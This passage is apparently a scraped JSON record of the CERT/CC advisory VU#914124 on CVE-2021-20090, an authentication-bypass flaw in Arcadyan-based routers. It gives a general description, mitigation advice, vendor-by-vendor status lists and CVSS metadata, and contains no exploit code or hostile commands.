Updated: 2021-08-16\n\n**Statement Date: August 16, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### OpenWRT Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Peplink Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Sierra Wireless Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Synology Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Zyxel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-18\n\n**Statement Date: August 18, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### D-Link Systems Inc. __ Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nD-Link US SIRT,\n\nWe have elevated information to D-Link Corporation for investigation.\n\nIf affected and we have scope we will update. \n\nThank you for the notification, William Brown security@dlink.com\n\n### A10 Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ACCESS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Alcatel-Lucent Enterprise Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Arcadyan Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ARRIS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ASUSTeK Computer Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AT&amp;T Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Avaya Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Beeline Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Belkin Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### British Telecommunications Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cisco Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Comcast Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Commscope Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### eero Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F-Secure Corporation Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hitachi Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Huawei Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hughes Network Systems Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Juniper Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Linksys Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### MikroTik Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Mitel Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Motorola Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NetComm Wireless Limited Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Netgear Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Nokia Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### pfSense Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quagga Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quantenna Communications Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ruckus Wireless Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### SMC Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TDS Telecom Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Technicolor Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Telus Unknown\n\nNotified: 2021-07-08 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TP-LINK Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ubiquiti Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Verizon Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vodafone Group Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Wind River Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 61 vendors __View less vendors __\n\n \n\n\n### References \n\n * <https://www.tenable.com/security/research/tra-2021-13>\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n * <https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-20090 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-20090>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-08-18 14:09 UTC \n**Document Revision: ** | 13 \n", "published": "2021-07-20T00:00:00", "modified": "2021-08-18T14:09:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.kb.cert.org/vuls/id/914124", "reporter": "CERT", "references": ["https://www.tenable.com/security/research/tra-2021-13", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090", "https://www.buffalo.jp/news/detail/20210427-03.html", "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2"], "cvelist": ["CVE-2021-20090"], "immutableFields": [], "lastseen": "2021-08-18T17:53:14", "history": [], "viewCount": 43, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20090"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7", "MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "seebug", "idList": ["SSV:99329"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}], "modified": "2021-08-18T17:53:14", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2021-08-18T17:53:14", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2021-08-18T17:53:14", "differentElements": ["description", "modified"], "edition": 10}, {"bulletin": {"id": "VU:914124", "hash": "c982be947d61d265b03ff31c67a8f357", "type": "cert", "bulletinFamily": "info", "title": "Arcadyan-based routers and modems vulnerable to authentication bypass", "description": "### Overview\n\nA path traversal vulnerability exists in numerous routers manufactured by multiple vendors using Arcadyan based software. This vulnerability allows an unauthenticated user access to sensitive information and allows for the alteration of the router configuration.\n\n### Description\n\nThe vulnerability, identified as [CVE-2021-20090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>), is a path traversal vulnerability. An unauthenticated attacker is able to leverage this vulnerability to access resources that would normally be protected. The researcher initially thought it was limited to one router manufacturer and published their [findings](<https://www.tenable.com/security/research/tra-2021-13>), but then discovered that the issue existed in the Arcadyan based software that was being used in routers from multiple vendors.\n\n### Impact\n\nSuccessful exploitation of this vulnerability could allow an attacker to access pages that would otherwise require authentication. An unauthenticated attacker could gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n### Solution\n\nThe CERT/CC recommends updating your router to the latest available firmware version. It is also recommended to disable the remote (WAN-side) administration services on any SoHo router and also disable the web interface on the WAN. \n\n### Acknowledgements\n\nThanks to the reporter Evan Grant from Tenable.\n\nThis document was written by Timur Snoke.\n\n### Vendor Information \n\n914124\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Buffalo Technology __ Affected\n\nNotified: 2021-07-06 Updated: 2021-08-03 **CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n\n### Deutsche Telekom __ Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\na detailed List and Product Advisory is being created, as well as fixes.\n\n### Actiontec Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ADTRAN Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AVM GmbH __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAVM does not utilize Arcadyan components.\n\n#### References\n\n * <https://en.avm.de/security/>\n\n### Brocade Communication Systems __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Brocade Fibre Channel Products from Broadcom products are currently known to be affected by this vulnerability.\n\n### Check Point Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cradlepoint Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### dd-wrt Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F5 Networks Inc. Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Intel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### LANCOM Systems GmbH Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-16\n\n**Statement Date: August 16, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### OpenWRT Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Peplink Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Sierra Wireless Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Synology Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Wind River __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-09-06\n\n**Statement Date: September 06, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nVxWorks are not affect as we do not use Arcadyan-based routers and modems\n\n### Zyxel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-18\n\n**Statement Date: August 18, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### D-Link Systems Inc. __ Unknown\n\nNotified: 2021-08-10 Updated: 2021-09-06\n\n**Statement Date: August 31, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nD-Link US SIRT,\n\nAfter full investigation, D-Link has confirmed that no D-Link product are affected by this issue.\n\nRegards, security@dlink.com William Brown D-Link US SIRT\n\n#### References\n\n * [None Applicable](<None Applicable>)\n\n### A10 Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ACCESS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Alcatel-Lucent Enterprise Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Arcadyan Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ARRIS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ASUSTeK Computer Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AT&amp;T Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Avaya Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Beeline Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Belkin Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### British Telecommunications Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cisco Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Comcast Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Commscope Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### eero Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F-Secure Corporation Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hitachi Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Huawei Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hughes Network Systems Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Juniper Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Linksys Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### MikroTik Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Mitel Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Motorola Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NetComm Wireless Limited Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NETGEAR Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Nokia Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### pfSense Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quagga Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quantenna Communications Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ruckus Wireless Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### SMC Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TDS Telecom Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Technicolor Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Telus Unknown\n\nNotified: 2021-07-08 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TP-LINK Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ubiquiti Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Verizon Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vodafone Group Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 61 vendors __View less vendors __\n\n \n\n\n### References \n\n * <https://www.tenable.com/security/research/tra-2021-13>\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n * <https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-20090 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-20090>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-09-06 16:29 UTC \n**Document Revision: ** | 14 \n", "published": "2021-07-20T00:00:00", "modified": "2021-09-06T16:29:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.kb.cert.org/vuls/id/914124", "reporter": "CERT", "references": ["https://www.tenable.com/security/research/tra-2021-13", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090", "https://www.buffalo.jp/news/detail/20210427-03.html", "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2"], 